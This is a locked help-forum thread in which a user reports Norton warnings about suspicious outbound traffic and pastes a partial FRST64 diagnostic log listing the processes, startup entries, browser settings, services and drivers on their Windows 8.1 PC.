Jump to content

Welcome to Geeks to Go - Register now for FREE

Need help with your computer or device? Want to learn new tech skills? You're in the right place!
Geeks to Go is a friendly community of tech experts who can solve any problem you have. Just create a free account and post your question. Our volunteers will reply quickly and guide you through the steps. Don't let tech troubles stop you. Join Geeks to Go now and get the support you need!

How it Works Create Account
Photo

My computer doing frequently asking strange questions [Closed]


  • This topic is locked This topic is locked

#1
rdholden

rdholden

    New Member

  • Member
  • Pip
  • 1 posts

My computer frequently notifies me that I need to run Norton Power Eraser because a large amount of suspicious outbound traffic has been detected on my system.  I hesitate to run NPE because of a warning that states certain aspects of my computer may change as a result.

 

The following represents results from the scan performed by FRST64 a few minutes ago.

 

 

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:07-11-2015
Ran by Holden (administrator) on HPENVYPC (08-11-2015 07:38:05)
Running from C:\Users\Holden\Desktop\FRST64
Loaded Profiles: Holden (Available Profiles: Holden)
Platform: Windows 8.1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
() C:\Program Files\Hewlett-Packard\SimplePass\cachesrvr.exe
(Softex Inc.) C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe
(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\stacsv64.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\ClientX64\officeclicktorun.exe
(Coupons.com Inc.) C:\Program Files (x86)\Coupons\CouponPrinterService.exe
(CyberLink) C:\Program Files (x86)\CyberLink\PowerDVD12\Kernel\DMS\CLMSMonitorServicePDVD12.exe
(Symantec Corporation) C:\Program Files (x86)\Norton 360\Engine\22.5.4.24\n360.exe
(Intuit) C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe
(Intuit Inc.) C:\Program Files (x86)\Common Files\Intuit\DataProtect\QBIDPService.exe
(Microsoft Corporation) C:\Windows\System32\alg.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Symantec Corporation) C:\Program Files (x86)\Norton 360\Engine\22.5.4.24\n360.exe
() C:\Program Files\Hewlett-Packard\SimplePass\opvapp.exe
(Microsoft Corporation) C:\Windows\System32\SkyDrive.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\sttray64.exe
(Hewlett-Packard) C:\Program Files\Hewlett-Packard\SimplePass\HPSmplPass.exe
(Hewlett-Packard) C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBroker.exe
(Hewlett-Packard) C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBrokerDsktop.exe
(CANON INC.) C:\Program Files\Canon\MyPrinter\BJMYPRT.EXE
(CANON INC.) C:\Program Files (x86)\Canon\SolutionMenu\CNSLMAIN.EXE
(Intuit Inc.) C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBUpdate\qbupdate.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\root\office15\onenotem.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Glarysoft Ltd) C:\Program Files (x86)\Glary Utilities 5\Integrator.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(CyberLink) C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe
(Microsoft Corporation) C:\Windows\System32\GWX\GWX.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe
(Intuit Inc.) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
(Intuit Inc.) C:\Program Files (x86)\Common Files\Intuit\DataProtect\IntuitDataProtect.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(CANON INC.) C:\Program Files (x86)\Canon\Canon IJ Network Scan Utility\CNMNSUT.exe
(Hewlett-Packard ) C:\Program Files\IDT\WDM\Beats64.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\root\office15\OUTLOOK.EXE
(Microsoft Corporation) C:\Windows\System32\WWAHost.exe
() C:\Program Files\WindowsApps\26720RandomSaladGamesLLC.GinRummyPro_2.0.1.15_neutral__kx24dqmazqk8j\GinRummy.exe
() C:\Program Files (x86)\Common Files\Intuit\DataProtect\IBuEngHost.exe
(Glarysoft Ltd) C:\Program Files (x86)\Glary Utilities 5\MemfilesService.exe
(Glarysoft Ltd) C:\Program Files (x86)\Glary Utilities 5\x64\Win64ShellLink.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(CyberLink) C:\Program Files (x86)\CyberLink\PowerDVD12\Kernel\DMS\CLMSServerPDVD12.exe
(Microsoft Corporation) C:\Windows\splwow64.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\livecomm.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Farbar) C:\Users\Holden\Desktop\FRST64\FRST64 (1).exe
 
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [BeatsOSDApp] => C:\Program Files\IDT\WDM\beats64.exe [41664 2012-08-22] (Hewlett-Packard )
HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [1703424 2013-06-04] (IDT, Inc.)
HKLM\...\Run: [SimplePass] => C:\Program Files\Hewlett-Packard\SimplePass\HPSmplPass.exe [2793016 2013-09-05] (Hewlett-Packard)
HKLM\...\Run: [OPBHOBroker] => C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBroker.exe [154680 2013-09-05] (Hewlett-Packard)
HKLM\...\Run: [OPBHOBrokerDesktop] => C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBrokerDsktop.exe [154680 2013-09-05] (Hewlett-Packard)
HKLM\...\Run: [CanonMyPrinter] => C:\Program Files\Canon\MyPrinter\BJMyPrt.exe [2710856 2009-11-01] (CANON INC.)
HKLM\...\Run: [CanonSolutionMenu] => C:\Program Files (x86)\Canon\SolutionMenu\CNSLMAIN.exe [767312 2009-09-03] (CANON INC.)
HKLM-x32\...\Run: [StartCCC] => c:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe [766208 2013-09-11] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [IJNetworkScanUtility] => C:\Program Files (x86)\Canon\Canon IJ Network Scan Utility\CNMNSUT.exe [140640 2009-09-28] (CANON INC.)
HKLM-x32\...\Run: [Intuit SyncManager] => C:\Program Files (x86)\Common Files\Intuit\Sync\IntuitSyncManager.exe [3775800 2014-02-27] (Intuit Inc. All rights reserved.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [597552 2015-08-04] (Oracle Corporation)
HKU\S-1-5-21-3264377140-702172241-3405489607-1001\...\Run: [GUDelayStartup] => C:\Program Files (x86)\Glary Utilities 5\StartupManager.exe [37152 2015-10-26] (Glarysoft Ltd)
HKU\S-1-5-21-3264377140-702172241-3405489607-1001\...\Run: [GoogleChromeAutoLaunch_004E6E1CFF9247157F19EAB6B0F7D368] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [811848 2015-10-20] (Google Inc.)
AppInit_DLLs-x32: C:\PROGRA~3\{6EB98~1\201~1.9\fico.dll => C:\ProgramData\{6EB9867A-3E3B-57FC-8FBD-277E5F3FF4F0}\2.0.1.9\fico.dll [606720 2015-08-03] ()
ShellIconOverlayIdentifiers: [  OverlayExcluded] -> {4433A54A-1AC8-432F-90FC-85F045CF383C} => C:\Program Files (x86)\Norton 360\Engine64\22.5.4.24\buShell.dll [2015-08-27] (Symantec Corporation)
ShellIconOverlayIdentifiers: [  OverlayPending] -> {F17C0B1E-EF8E-4AD4-8E1B-7D7E8CB23225} => C:\Program Files (x86)\Norton 360\Engine64\22.5.4.24\buShell.dll [2015-08-27] (Symantec Corporation)
ShellIconOverlayIdentifiers: [  OverlayProtected] -> {476D0EA3-80F9-48B5-B70B-05E677C9C148} => C:\Program Files (x86)\Norton 360\Engine64\22.5.4.24\buShell.dll [2015-08-27] (Symantec Corporation)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Intuit Data Protect.lnk [2014-10-27]
ShortcutTarget: Intuit Data Protect.lnk -> C:\Program Files (x86)\Common Files\Intuit\DataProtect\IntuitDataProtect.exe (Intuit Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\QuickBooks Update Agent.lnk [2014-10-27]
ShortcutTarget: QuickBooks Update Agent.lnk -> C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBUpdate\qbupdate.exe (Intuit Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\QuickBooks_Standard_21.lnk [2014-10-27]
ShortcutTarget: QuickBooks_Standard_21.lnk -> C:\Program Files (x86)\Intuit\QuickBooks 2014\QBW32.EXE (Intuit Inc.)
Startup: C:\Users\Holden\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk [2015-07-02]
ShortcutTarget: Send to OneNote.lnk -> C:\Program Files\Microsoft Office 15\root\office15\onenotem.exe (Microsoft Corporation)
BootExecute: autocheck autochk *  
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{9CF2E8B5-1EEA-42CD-889D-A9E8190D3404}: [DhcpNameServer] 192.168.0.1
 
Internet Explorer:
==================
HKU\S-1-5-21-3264377140-702172241-3405489607-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://g.msn.com/HPDSK14/1
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://g.msn.com/HPDSK14/1
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPDSK14/1
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPDSK14/1
HKU\S-1-5-21-3264377140-702172241-3405489607-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.com/
SearchScopes: HKLM -> {9143e921-7c9a-4d27-ac43-eaccc78cc55a} URL = 
SearchScopes: HKLM -> {9FF7C6F1-0D35-4A9B-AE2A-C7E553322CDA} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us1-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKLM -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = hxxp://rover.ebay.com/rover/1/711-154371-11896-2/4 ?mpre=http%3A%2F%2Fwww.ebay.com%2Fsch%2F%3F_nkw%3D{searchTerms}&keyword={searchTerms}
SearchScopes: HKLM-x32 -> {9FF7C6F1-0D35-4A9B-AE2A-C7E553322CDA} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us1-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKLM-x32 -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = hxxp://rover.ebay.com/rover/1/711-154371-11896-2/4 ?mpre=http%3A%2F%2Fwww.ebay.com%2Fsch%2F%3F_nkw%3D{searchTerms}&keyword={searchTerms}
SearchScopes: HKU\S-1-5-21-3264377140-702172241-3405489607-1001 -> {9143e921-7c9a-4d27-ac43-eaccc78cc55a} URL = hxxp://search.yahoo.com/search?fr=mcafee&type=A011US400&p={SearchTerms}
SearchScopes: HKU\S-1-5-21-3264377140-702172241-3405489607-1001 -> {9FF7C6F1-0D35-4A9B-AE2A-C7E553322CDA} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us1-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKU\S-1-5-21-3264377140-702172241-3405489607-1001 -> {AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} URL = hxxp://nortonsafe.search.ask.com/web?q={SEARCHTERMS}&o=APN10506&l=dis&prt=360&chn=S1122&geo=US&ver=21&locale=en_US&gct=kwd&qsrc=2869
SearchScopes: HKU\S-1-5-21-3264377140-702172241-3405489607-1001 -> {C71C5517-93E7-46AA-8EDD-1D624008A30F} URL = hxxp://www.cassiopessa.com/results.php?f=4&q={searchTerms}&a=csp_tight14_15_32&cd=2XzuyEtN2Y1L1Qzu0AtD0DtA0CtCyEyE0ByEtDyCtBzzyDtBtN0D0Tzu0StCtAtCtDtN1L2XzutAtFtCtCtFtAtFtCtN1L1CzutN1L1G1B1V1N2Y1L1Qzu2SyD0D0AyE0DyCtC0CtGyD0FyCyBtG0AtD0E0CtGyByE0D0AtGyE0DyE0FyEyC0AyDtDyEzytB2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0CtAtCyC0BtDtA0BtG0A0EtA0FtGyE0E0CtCtGzy0ByDyBtG0FyC0Czy0C0ByE0E0FzytAzy2QtN0A0LzuyEtN1B2Z1V1T1S1NzuzytCtA&cr=1196457357&ir=
SearchScopes: HKU\S-1-5-21-3264377140-702172241-3405489607-1001 -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = hxxp://rover.ebay.com/rover/1/711-154371-11896-2/4 ?mpre=http%3A%2F%2Fwww.ebay.com%2Fsch%2F%3F_nkw%3D{searchTerms}&keyword={searchTerms}
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\OCHelper.dll [2015-09-29] (Microsoft Corporation)
BHO: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton 360\Engine64\22.5.4.24\coIEPlg.dll [2015-09-23] (Symantec Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\GROOVEEX.DLL [2015-10-28] (Microsoft Corporation)
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll [2013-08-23] (Hewlett-Packard)
BHO-x32: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton 360\Engine\22.5.4.24\coIEPlg.dll [2015-09-23] (Symantec Corporation)
BHO-x32: Norton Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files (x86)\Norton Security Suite\Engine\21.7.0.11\IPS\IPSBHO.DLL => No File
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_60\bin\ssv.dll [2015-10-12] (Oracle Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_60\bin\jp2ssv.dll [2015-10-12] (Oracle Corporation)
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2013-08-23] (Hewlett-Packard)
Toolbar: HKLM - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton 360\Engine64\22.5.4.24\coIEPlg.dll [2015-09-23] (Symantec Corporation)
Toolbar: HKLM-x32 - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton 360\Engine\22.5.4.24\coIEPlg.dll [2015-09-23] (Symantec Corporation)
DPF: HKLM-x32 {55A2C0CD-3DE8-4264-9637-A0B40B05714E} hxxps://col430-sec.mail.live.com/mail/MailMigrationCabFileHolder.aspx?n=301533237
DPF: HKLM-x32 {A4110378-789B-455F-AE86-3A1BFC402853} hxxp://zone.msn.com/bingame/zpagames/zpa_shvl.cab55579.cab
DPF: HKLM-x32 {B8BE5E93-A60C-4D26-A2DC-220313175592} hxxp://cdn2.zone.msn.com/binFramework/v10/ZPAFramework.cab102118.cab
Handler-x32: intu-help-qb7 - {5A03BD9D-766D-47A6-8E87-CD90F60BE245} - C:\Program Files (x86)\Intuit\QuickBooks 2014\HelpAsyncPluggableProtocol.dll [2014-12-10] (Intuit, Inc.)
Handler-x32: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\Office15\MSOSB.DLL [2015-02-03] (Microsoft Corporation)
Handler-x32: qbwc - {FC598A64-626C-4447-85B8-53150405FD57} - C:\windows\SysWOW64\mscoree.dll [2013-08-21] (Microsoft Corporation)
StartMenuInternet: IEXPLORE.EXE - iexplore.exe
 
FireFox:
========
FF Plugin-x32: @canon.com/EPPEX -> C:\Program Files (x86)\Canon\Easy-PhotoPrint EX\NPEZFFPI.DLL [2010-02-04] (CANON INC.)
FF Plugin-x32: @java.com/DTPlugin,version=11.60.2 -> C:\Program Files (x86)\Java\jre1.8.0_60\bin\dtplugin\npDeployJava1.dll [2015-10-12] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.60.2 -> C:\Program Files (x86)\Java\jre1.8.0_60\bin\plugin2\npjp2.dll [2015-10-12] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL [2014-10-24] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3508.0205 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2013-02-06] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.28.15\npGoogleUpdate3.dll [2015-09-23] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.28.15\npGoogleUpdate3.dll [2015-09-23] (Google Inc.)
FF HKLM\...\Firefox\Extensions: [{C1A2A613-35F1-4FCF-B27F-2840527B6556}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_22.5.2.15\coFFAddon
FF Extension: Norton Identity Safe - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_22.5.2.15\coFFAddon [2015-11-03] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{C1A2A613-35F1-4FCF-B27F-2840527B6556}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_22.5.2.15\coFFAddon
 
Chrome: 
=======
CHR HomePage: Default -> hxxp://www.google.com
CHR StartupUrls: Default -> "hxxp://www.google.com/","hxxps://www.google.com/"
CHR Profile: C:\Users\Holden\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\Holden\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-02-11]
CHR Extension: (Google Docs) - C:\Users\Holden\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-02-11]
CHR Extension: (Google Drive) - C:\Users\Holden\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-21]
CHR Extension: (YouTube) - C:\Users\Holden\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-25]
CHR Extension: (Norton Security Toolbar) - C:\Users\Holden\AppData\Local\Google\Chrome\User Data\Default\Extensions\cjabmdjcfcfdmffimndhafhblfmpjdpe [2015-10-13]
CHR Extension: (Google Search) - C:\Users\Holden\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-28]
CHR Extension: (Email this page (by Google)) - C:\Users\Holden\AppData\Local\Google\Chrome\User Data\Default\Extensions\dbeoemfhkdniadbojeencpkgmobndpai [2014-10-24]
CHR Extension: (Google Sheets) - C:\Users\Holden\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-02-11]
CHR Extension: (Office Editing for Docs, Sheets & Slides) - C:\Users\Holden\AppData\Local\Google\Chrome\User Data\Default\Extensions\gbkeegbaiigmenfmjfclcdgdpimamgkj [2015-11-06]
CHR Extension: (Google Docs Offline) - C:\Users\Holden\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-09-04]
CHR Extension: (Norton Identity Safe) - C:\Users\Holden\AppData\Local\Google\Chrome\User Data\Default\Extensions\iikflkcanblccfahdhdonehdalibjnif [2014-10-25]
CHR Extension: (Google Dictionary (by Google)) - C:\Users\Holden\AppData\Local\Google\Chrome\User Data\Default\Extensions\mgijmajocgfcbeboacabfgobmjgjcoja [2014-10-24]
CHR Extension: (Baseball) - C:\Users\Holden\AppData\Local\Google\Chrome\User Data\Default\Extensions\njneehkdlobpllhkldmhhephffnniaec [2014-10-24]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Holden\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-07-24]
CHR Extension: (Gmail) - C:\Users\Holden\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-03-31]
CHR HKLM\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files (x86)\Norton 360\Engine\22.5.4.24\Exts\Chrome.crx [2015-09-30]
CHR HKLM\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files (x86)\Norton 360\Engine\22.5.4.24\Exts\Chrome.crx [2015-09-30]
CHR HKLM-x32\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx
 
==================== Services (Whitelisted) ========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 Cachedrv server; C:\Program Files\Hewlett-Packard\SimplePass\cachesrvr.exe [109568 2013-09-05] () [File not signed]
R2 ClickToRunSvc; C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe [2780856 2015-10-07] (Microsoft Corporation)
R2 CouponPrinterService; C:\Program Files (x86)\Coupons\CouponPrinterService.exe [179184 2014-10-15] (Coupons.com Inc.)
R2 CyberLink PowerDVD 12 Media Server Monitor Service; c:\Program Files (x86)\CyberLink\PowerDVD12\Kernel\DMS\CLMSMonitorServicePDVD12.exe [77576 2013-08-12] (CyberLink)
R2 CyberLink PowerDVD 12 Media Server Service; c:\Program Files (x86)\CyberLink\PowerDVD12\Kernel\DMS\CLMSServerPDVD12.exe [298760 2013-08-12] (CyberLink)
R2 N360; C:\Program Files (x86)\Norton 360\Engine\22.5.4.24\N360.exe [282016 2015-09-24] (Symantec Corporation)
R2 omniserv; C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe [87552 2013-09-05] (Softex Inc.) [File not signed]
R2 QBCFMonitorService; C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe [45056 2014-12-10] (Intuit) [File not signed]
S3 QBFCService; C:\Program Files (x86)\Common Files\Intuit\QuickBooks\FCS\Intuit.QuickBooks.FCS.exe [65536 2013-10-10] (Intuit Inc.) [File not signed]
R2 QBVSS; C:\Program Files (x86)\Common Files\Intuit\DataProtect\QBIDPService.exe [1248256 2013-08-19] (Intuit Inc.) [File not signed]
R2 STacSV; C:\Program Files\IDT\WDM\STacSV64.exe [333824 2013-06-04] (IDT, Inc.) [File not signed]
S3 w3logsvc; C:\Windows\system32\inetsrv\w3logsvc.dll [76800 2013-08-24] (Microsoft Corporation)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366552 2015-07-07] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23824 2015-07-07] (Microsoft Corporation)
S3 McAfee SiteAdvisor Service; c:\PROGRA~2\mcafee\SITEAD~1\mcsacore.exe [X]
S3 McAPExe; "C:\Program Files\McAfee\MSC\McAPExe.exe" [X]
 
===================== Drivers (Whitelisted) ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R0 amdkmpfd; C:\Windows\System32\drivers\amdkmpfd.sys [36096 2013-05-22] (Advanced Micro Devices, Inc.)
R1 BHDrvx64; C:\Program Files (x86)\Norton 360\NortonData\22.5.2.15\Definitions\BASHDefs\20151102.001\BHDrvx64.sys [1665608 2015-10-08] (Symantec Corporation)
R3 BthLEEnum; C:\Windows\System32\drivers\BthLEEnum.sys [226304 2013-12-04] (Microsoft Corporation)
R1 ccSet_N360; C:\Windows\system32\drivers\N360x64\1605040.018\ccSetx64.sys [173808 2015-07-10] (Symantec Corporation)
R1 CLVirtualDrive; C:\Windows\system32\DRIVERS\CLVirtualDrive.sys [91712 2013-03-05] (CyberLink)
S0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3357024 2013-08-22] (Broadcom Corporation)
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [498512 2015-07-27] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [153936 2015-07-27] (Symantec Corporation)
R1 GUBootStartup; C:\windows\System32\drivers\GUBootStartup.sys [20160 2015-05-26] (Glarysoft Ltd)
R1 IDSVia64; C:\Program Files (x86)\Norton 360\NortonData\22.5.2.15\Definitions\IPSDefs\20151106.001\IDSvia64.sys [767224 2015-10-20] (Symantec Corporation)
R3 NAVENG; C:\Program Files (x86)\Norton 360\NortonData\22.5.2.15\Definitions\VirusDefs\20151107.001\ENG64.SYS [138488 2015-10-26] (Symantec Corporation)
R3 NAVEX15; C:\Program Files (x86)\Norton 360\NortonData\22.5.2.15\Definitions\VirusDefs\20151107.001\EX64.SYS [2148080 2015-10-26] (Symantec Corporation)
R3 netr28x; C:\Windows\system32\DRIVERS\netr28x.sys [2512016 2014-06-13] (MediaTek Inc.)
R3 rtbth; C:\Windows\System32\drivers\rtbth.sys [1205448 2013-12-27] (Ralink Technology, Corp.)
R3 SRTSP; C:\Windows\System32\Drivers\N360x64\1605040.018\SRTSP64.SYS [930024 2015-09-23] (Symantec Corporation)
R1 SRTSPX; C:\Windows\system32\drivers\N360x64\1605040.018\SRTSPX64.SYS [50936 2015-07-10] (Symantec Corporation)
S3 ssmirrdr; C:\Windows\system32\DRIVERS\ssmirrdr.sys [10112 2011-03-15] (support.com, Inc)
R0 SymEFASI; C:\Windows\System32\drivers\N360x64\1605040.018\SYMEFASI64.SYS [1620720 2015-07-10] (Symantec Corporation)
S0 SymELAM; C:\Windows\System32\drivers\N360x64\1605040.018\SymELAM.sys [24192 2015-07-10] (Symantec Corporation)
R3 SymEvent; C:\windows\system32\Drivers\SYMEVENT64x86.SYS [111344 2015-08-09] (Symantec Corporation)
R1 SymIRON; C:\Windows\system32\drivers\N360x64\1605040.018\Ironx64.SYS [297720 2015-07-10] (Symantec Corporation)
R1 SymNetS; C:\Windows\System32\Drivers\N360x64\1605040.018\SYMNETS.SYS [577768 2015-09-23] (Symantec Corporation)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44560 2015-07-07] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [270168 2015-07-07] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114520 2015-07-07] (Microsoft Corporation)
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2015-11-08 07:27 - 2015-11-08 07:38 - 00000000 ____D C:\FRST
2015-11-08 07:23 - 2015-11-08 07:34 - 00000000 ____D C:\Users\Holden\Desktop\FRST64
